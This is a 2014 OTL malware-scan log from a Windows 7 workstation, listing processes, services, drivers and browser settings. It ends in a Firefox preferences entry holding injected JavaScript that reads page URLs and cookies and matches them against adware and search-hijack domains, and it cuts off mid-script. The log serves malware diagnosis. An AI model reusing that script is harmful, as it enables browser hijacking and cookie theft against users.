OTL logfile created on: 2014-12-23 12:24:59 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\dkoloszc\Desktop
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000415 | Country: Poland | Language: PLK | Date Format: yyyy-MM-dd
 
7,91 Gb Total Physical Memory | 4,87 Gb Available Physical Memory | 61,64% Memory free
15,81 Gb Paging File | 12,02 Gb Available in Paging File | 76,03% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 226,19 Gb Total Space | 143,45 Gb Free Space | 63,42% Space Free | Partition Type: NTFS
Drive Y: | 12,25 Gb Total Space | 4,35 Gb Free Space | 35,50% Space Free | Partition Type: NTFS
Drive Z: | 3246,46 Gb Total Space | 3,55 Gb Free Space | 0,11% Space Free | Partition Type: NTFS
 
Computer Name: LOD-XDKOLOSZC | User Name: dkoloszc | NOT logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
[color=#E56717]========== Processes (SafeList) ==========[/color]
 
PRC - File not found -- 
PRC - [2014-12-23 12:24:06 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\dkoloszc\Desktop\OTL.exe
PRC - [2014-12-06 02:50:53 | 000,856,904 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2014-12-05 02:09:46 | 003,346,192 | ---- | M] ( Rsupport Corporation) -- C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe
PRC - [2014-12-03 07:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014-12-01 16:55:24 | 004,907,232 | ---- | M] (Emsisoft GmbH) -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
PRC - [2014-12-01 16:55:22 | 004,954,576 | ---- | M] (Emsisoft GmbH) -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
PRC - [2014-11-07 02:06:23 | 001,016,104 | ---- | M] () -- C:\Program Files (x86)\RSUPPORT\MobizenService\dat\adb.exe
PRC - [2014-10-29 23:25:46 | 004,673,432 | ---- | M] (Akamai Technologies, Inc.) -- C:\Users\dkoloszc\AppData\Local\Akamai\netsession_win.exe
PRC - [2014-08-20 09:38:58 | 000,788,776 | ---- | M] (Rsupport corporation) -- C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenTray.exe
PRC - [2014-08-14 23:51:42 | 000,095,016 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\WebEx\Productivity Tools\ptSrv.exe
PRC - [2014-08-14 23:51:40 | 000,488,744 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\WebEx\Productivity Tools\PTIM.exe
PRC - [2014-08-14 23:51:40 | 000,386,344 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\WebEx\Productivity Tools\ptoneclk.exe
PRC - [2014-08-12 10:42:08 | 000,736,768 | ---- | M] () -- C:\Program Files (x86)\Syncios\SynciosDeviceService.exe
PRC - [2014-07-17 15:48:42 | 000,472,320 | ---- | M] (Trend Micro Inc.) -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\CNTAoSMgr.exe
PRC - [2014-03-21 01:40:50 | 002,691,480 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
PRC - [2014-03-18 22:18:30 | 000,419,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
PRC - [2014-02-19 05:06:04 | 000,769,904 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
PRC - [2014-02-18 16:03:26 | 004,697,968 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncV1\CoreSync.exe
PRC - [2013-09-12 22:55:30 | 000,390,616 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2013-09-12 22:55:14 | 000,169,432 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
PRC - [2013-09-11 03:00:00 | 000,642,232 | ---- | M] (Microsoft Corporation) -- C:\Windows\CCM\SCNotification.exe
PRC - [2013-06-25 16:01:18 | 001,132,920 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
PRC - [2013-05-29 21:09:02 | 000,286,704 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
PRC - [2013-05-29 21:09:02 | 000,015,344 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2013-05-23 15:17:24 | 004,124,760 | ---- | M] (SoftThinks - Dell) -- C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
PRC - [2013-05-23 15:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
PRC - [2013-04-26 17:41:06 | 000,292,848 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
PRC - [2013-04-23 22:51:04 | 000,960,888 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
PRC - [2013-04-23 22:50:50 | 001,366,392 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
PRC - [2013-04-23 22:50:46 | 001,153,400 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
PRC - [2011-12-16 22:17:32 | 000,462,974 | ---- | M] (Creative Technology Ltd) -- C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
PRC - [2009-02-04 14:35:00 | 000,078,848 | ---- | M] (DameWare Development) -- C:\Windows\SysWOW64\DWRCST.EXE
PRC - [2009-02-04 14:34:46 | 000,234,496 | ---- | M] (DameWare Development LLC) -- C:\Windows\SysWOW64\DWRCS.EXE
 
 
[color=#E56717]========== Modules (No Company Name) ==========[/color]
 
MOD - [2014-12-06 02:50:50 | 009,009,480 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\pdf.dll
MOD - [2014-12-06 02:50:46 | 001,077,064 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libglesv2.dll
MOD - [2014-12-06 02:50:45 | 000,211,272 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libegl.dll
MOD - [2014-12-06 02:50:44 | 001,677,128 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\ffmpegsumo.dll
MOD - [2014-11-21 16:00:42 | 001,920,512 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\16c1dbd6f93dcb120eef2ae20742b8ec\Microsoft.VisualBasic.ni.dll
MOD - [2014-11-21 16:00:40 | 000,790,528 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\a7b0df9c8a43432068cef3c2f1e2f987\System.Runtime.Remoting.ni.dll
MOD - [2014-10-24 11:25:20 | 002,959,360 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\9f693486073df43921547e95dcec8e89\System.IdentityModel.ni.dll
MOD - [2014-10-24 11:25:18 | 000,523,776 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\b7ef611f4ae747d248ddfaa47174dcb3\System.Net.Http.ni.dll
MOD - [2014-10-24 11:25:17 | 019,543,552 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\0ee8f72a7cf63a20638c6b57ead95793\System.ServiceModel.ni.dll
MOD - [2014-10-24 11:25:08 | 001,075,712 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\0f9d5b9b1391247d37be668f21f06a5e\System.ServiceModel.Web.ni.dll
MOD - [2014-10-24 08:34:46 | 000,902,144 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SCNotification\8cdd19268ddb2c6b7ba8c6e8c06385bd\SCNotification.ni.exe
MOD - [2014-10-24 08:34:45 | 000,482,304 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SCClient.Data\6701ecfe04244c6e9d6d17753068c4ee\SCClient.Data.ni.dll
MOD - [2014-10-24 08:34:45 | 000,444,416 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SCClient.Common\1a9ce6339c0203d474c17d7459baaadc\SCClient.Common.ni.dll
MOD - [2014-10-24 08:34:45 | 000,397,312 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\7e789f4da59ec129f51132de665b1f53\System.Xml.Linq.ni.dll
MOD - [2014-10-23 14:55:38 | 018,545,152 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\2a1df337efa2dc04d317540acde1ce2f\PresentationFramework.ni.dll
MOD - [2014-10-23 14:55:28 | 010,926,592 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\79105e7449ea97680af196e30c551165\PresentationCore.ni.dll
MOD - [2014-10-23 14:55:25 | 001,880,576 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\75576226f24bd0cea3fb0c0d1f010410\System.Xaml.ni.dll
MOD - [2014-10-23 14:55:21 | 012,700,160 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\0bf718f6921da10929df3b244fd2494f\System.Windows.Forms.ni.dll
MOD - [2014-10-23 14:55:20 | 000,462,336 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\3cc988049412723069aee05ea4f540af\PresentationFramework.Aero.ni.dll
MOD - [2014-10-23 14:55:17 | 003,910,144 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\04deb37ab2a41a7caa5e46435afc7e51\WindowsBase.ni.dll
MOD - [2014-10-23 14:55:14 | 007,573,504 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\8f294be4e4b9efc88db041576bd1ce56\System.Xml.ni.dll
MOD - [2014-10-23 14:55:14 | 006,998,016 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\95310fc0474a1aca96bfe04573fccb3b\System.Core.ni.dll
MOD - [2014-10-23 14:55:13 | 002,786,304 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\3266a2f34f11281b62bda23f09d0173d\System.Runtime.Serialization.ni.dll
MOD - [2014-10-23 14:55:12 | 000,121,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\4b7e744dfed483a36224384a25e6f0d6\SMDiagnostics.ni.dll
MOD - [2014-10-23 14:55:11 | 000,792,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\9ae2f43c7ebd76ba10547f9ae6c0dffe\System.ServiceModel.Internals.ni.dll
MOD - [2014-10-23 14:55:10 | 001,156,608 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\e97e33f9993d7f8c7c26e721c0575215\System.Management.ni.dll
MOD - [2014-10-23 14:55:10 | 000,964,096 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\1a62a2b95b3fef1ceab604f16423ec3e\System.Configuration.ni.dll
MOD - [2014-10-23 14:55:09 | 001,631,744 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\6040e91de3728c6fe65614e02e3d87a2\System.Drawing.ni.dll
MOD - [2014-10-23 14:55:07 | 009,987,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\36d22dfd5733b9b14fa0812e9159bb22\System.ni.dll
MOD - [2014-10-15 13:56:54 | 000,382,464 | ---- | M] () -- C:\Program Files (x86)\Syncios\DuiLib.dll
MOD - [2014-08-12 10:42:08 | 000,736,768 | ---- | M] () -- C:\Program Files (x86)\Syncios\SynciosDeviceService.exe
MOD - [2014-04-29 17:11:48 | 000,067,072 | ---- | M] () -- C:\Program Files (x86)\Syncios\zlib1.dll
MOD - [2014-03-18 22:22:06 | 032,733,088 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\libcef.dll
MOD - [2014-02-18 16:03:26 | 004,697,968 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncV1\CoreSync.exe
MOD - [2014-02-14 16:44:57 | 016,546,816 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\178f0b9d1e139fac0d3655add71fafa8\mscorlib.ni.dll
MOD - [2014-01-20 13:17:04 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014-01-20 13:16:40 | 000,237,384 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
MOD - [2014-01-20 13:16:38 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014-01-06 11:24:24 | 000,671,744 | ---- | M] () -- C:\Program Files (x86)\Syncios\hashAB.dll
MOD - [2013-05-02 23:01:12 | 001,813,792 | ---- | M] () -- C:\Program Files (x86)\Dell Backup and Recovery\OLCoreWrapper.dll
MOD - [2013-03-01 10:30:42 | 000,059,904 | ---- | M] () -- C:\Program Files (x86)\Syncios\zlib.dll
MOD - [2013-03-01 10:30:34 | 000,526,848 | ---- | M] () -- C:\Program Files (x86)\Syncios\sqlite3.dll
MOD - [2010-03-24 21:17:36 | 008,794,464 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
MOD - [2010-01-30 02:41:12 | 004,254,560 | ---- | M] () -- C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
 
 
[color=#E56717]========== Services (SafeList) ==========[/color]
 
SRV - [2014-12-11 10:30:48 | 000,315,496 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014-12-10 11:43:11 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014-12-05 02:09:46 | 003,346,192 | ---- | M] ( Rsupport Corporation) [Auto | Running] -- C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe -- (Mobizen plugin)
SRV - [2014-12-03 07:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014-12-01 16:55:24 | 004,907,232 | ---- | M] (Emsisoft GmbH) [Auto | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe -- (a2AntiMalware)
SRV - [2014-11-14 03:42:30 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014-10-13 11:16:54 | 004,668,864 | ---- | M] (Trend Micro Inc.) [Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe -- (tmlisten)
SRV - [2014-10-13 11:13:24 | 004,688,200 | ---- | M] (Trend Micro Inc.) [Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\Ntrtscan.exe -- (ntrtscan)
SRV - [2014-04-07 22:54:36 | 000,701,064 | ---- | M] (Trend Micro Inc.) [On_Demand | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\CCSF\TmCCSF.exe -- (TmCCSF)
SRV - [2014-03-20 23:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2014-03-19 20:08:22 | 000,575,024 | ---- | M] (Trend Micro Inc.) [On_Demand | Running] -- C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe -- (TMBMServer)
SRV - [2014-02-28 10:32:36 | 000,174,368 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe -- (iumsvc)
SRV - [2014-01-28 10:42:32 | 000,929,328 | ---- | M] (Trend Micro Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmProxy.exe -- (TmProxy)
SRV - [2013-09-12 22:55:30 | 000,390,616 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2013-09-12 22:55:14 | 000,169,432 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe -- (jhi_service)
SRV - [2013-09-11 03:00:00 | 001,571,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\CCM\CcmExec.exe -- (CcmExec)
SRV - [2013-09-11 03:00:00 | 000,577,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\CCM\RemCtrl\CmRcService.exe -- (CmRcService)
SRV - [2013-09-11 03:00:00 | 000,276,152 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\CCM\TSManager.exe -- (smstsmgr)
SRV - [2013-08-07 21:27:28 | 000,199,176 | ---- | M] (Dell Products, LP.) [Auto | Stopped] -- c:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe -- (DellDigitalDelivery)
SRV - [2013-07-30 20:14:42 | 000,124,616 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\Sandbox\SboxSvc.exe -- (SboxSvc)
SRV - [2013-07-30 20:14:40 | 002,947,856 | ---- | M] (Invincea, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\X64\InvProtectSvc64.exe -- (InvProtectSvc)
SRV - [2013-07-04 06:39:24 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2013-06-25 16:01:18 | 001,132,920 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe -- (Bluetooth Device Monitor)
SRV - [2013-05-23 15:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) [Auto | Running] -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe -- (SftService)
SRV - [2013-04-23 22:50:50 | 001,366,392 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe -- (Bluetooth Media Service)
SRV - [2013-04-23 22:50:46 | 001,153,400 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe -- (Bluetooth OBEX Service)
SRV - [2012-07-09 07:40:10 | 000,104,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2009-02-04 14:34:46 | 000,234,496 | ---- | M] (DameWare Development LLC) [Auto | Running] -- C:\Windows\SysWOW64\DWRCS.EXE -- (DWMRCS)
 
 
[color=#E56717]========== Driver Services (SafeList) ==========[/color]
 
DRV - [2014-08-30 21:12:00 | 000,351,032 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmxpflt.sys -- (TmFilter)
DRV - [2014-08-30 21:11:52 | 000,044,856 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmpreflt.sys -- (TmPreFilter)
DRV - [2014-08-30 21:04:28 | 002,316,600 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\VsapiNT.sys -- (VSApiNt)
DRV - [2014-05-12 17:43:58 | 000,071,472 | ---- | M] (Emsisoft GmbH) [File_System | On_Demand | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2accx64.sys -- (a2acc)
DRV - [2014-05-12 17:43:56 | 000,023,088 | ---- | M] (Emsisoft GmbH) [File_System | System | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys -- (a2util)
DRV - [2013-12-04 18:23:36 | 000,057,024 | ---- | M] (Emsisoft GmbH) [File_System | On_Demand | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys -- (cleanhlp)
DRV - [2013-09-30 17:23:02 | 000,045,208 | ---- | M] (Emsisoft GmbH) [File_System | System | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys -- (a2injectiondriver)
DRV - [2013-07-30 20:14:42 | 000,202,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\Sandbox\SboxDrv.sys -- (SboxDrv)
DRV - [2013-07-30 20:14:40 | 000,034,824 | ---- | M] () [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\X64\InvProtectDrv64.sys -- (InvProtectDrv)
DRV - [2013-03-28 18:03:02 | 000,026,176 | ---- | M] (Emsisoft GmbH) [File_System | System | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys -- (A2DDA)
DRV - [2009-07-14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
[color=#E56717]========== Standard Registry (SafeList) ==========[/color]
 
 
[color=#E56717]========== Internet Explorer ==========[/color]
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A95B20D-AC62-429B-80C4-8F7230A453FE}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=DCJB
 
 
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
 
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://dell13.msn.com/?pc=DCJB
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://dell13.msn.com/?pc=DCJB
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\..\SearchScopes,DefaultScope = {410CE52B-292E-4130-8FC8-25C25CE3AE78}
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..\SearchScopes,DefaultScope = {86B17854-62A7-4ADC-A917-B1E3E6A09144}
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..\SearchScopes\{86B17854-62A7-4ADC-A917-B1E3E6A09144}: "URL" = https://www.google.com/search?q={searchTerms}
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local>
 
[color=#E56717]========== FireFox ==========[/color]
 
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.1.1
FF - prefs.js..extensions.lB5Ci8CruTmZFPsg.scode: "try{(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|